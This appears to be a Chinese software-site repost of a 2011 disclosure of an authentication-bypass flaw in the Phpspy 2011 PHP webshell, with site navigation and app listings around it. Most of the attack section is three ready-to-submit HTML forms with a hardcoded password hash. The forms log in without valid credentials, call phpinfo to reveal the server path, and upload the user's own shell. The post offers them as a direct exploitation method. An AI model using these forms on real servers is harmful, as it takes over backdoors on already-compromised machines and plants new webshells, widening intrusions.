文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>Phpspy 2011 继续身份验证绕过漏洞

Phpspy 2011 继续身份验证绕过漏洞

时间:2011-05-02  来源:Tm3yShell7

发布日期:2011-05.02
发布作者:Tm3yShell7

漏洞类型:设计错误
漏洞描述:发现2011有不少借鉴WSO Shell的地方,看到$pass还是在那个函数的上面,但是验证成功过后用了一个Location重定向了一下,之后会再次检查一次cookies。

但是想不明白作者为什么这样做,和2010的原理一样,一样绕过:

下面给出一个更为直接的利用方法,上传你自己的新shell:

<form method=”POST” action=”http://www.hackshell.net/2011ok11.php”> <input name=”password” type=”text” size=”20″ value=”hackshell_net”> <input type=”hidden” name=”pass” value=”186c5d4c8ea2b5d95585cde854df00f9″> <input type=”hidden” name=”action” value=”login”> <input type=”submit” value=”Login”></form> 

点击Login,这步点登录后 是登录界面 继续操作下一步:

<form method=”POST” action=”http://www.hackshell.net/2011ok.php”> <input name=”password” type=”text” size=”20″ value=”hackshell_net”> <input type=”hidden” name=”pass” value=”186c5d4c8ea2b5d95585cde854df00f9″> <input type=”hidden” name=”action” value=”phpinfo”><input type=”submit” value=”Login”></form> 

密码写hackshell_net (默认写好) 点击login之后 查看当前脚本绝对路径,
然后访问:

<form action=”http://www.hackshell.net/2011ok.php” method=”POST” enctype=”multipart/form-data”> <input name=”password” type=”password” size=”20″> <input type=”hidden” name=”pass” value=”186c5d4c8ea2b5d95585cde854df00f9″> <input name=”uploadfile” value=”" type=”file”> <input name=”doupfile” value=”Upload” type=”submit”> <input name=”uploaddir” value=”D:/workspace/” type=”hidden”> <input name=”dir” value=”D:/workspace/” type=”hidden”> </form> 

其中把iploaddir的value改为phpinfo中看到的路径,上传shell。


Author: Tm3yShell7
首发:www.3est.com
Blog: www.HackShell.net
 

鄙视转载不留版权的,特别鄙视下那个什么hack情
http://hi.baidu.com/5427518 / http://www.hackqing.com/
我曾经还以为他是个人物。

今天m0r5和我说phpspy2011 我都不知道2011出来了 - – 就下下来看看

标签分类:

相关阅读 更多 +
排行榜 更多 +
幣安BNB币行情神器

幣安BNB币行情神器

金融理财 下载
愤怒的火柴人4中文版下载

愤怒的火柴人4中文版下载

角色扮演 下载
嘟嘟脸恶作剧手游下载

嘟嘟脸恶作剧手游下载

休闲益智 下载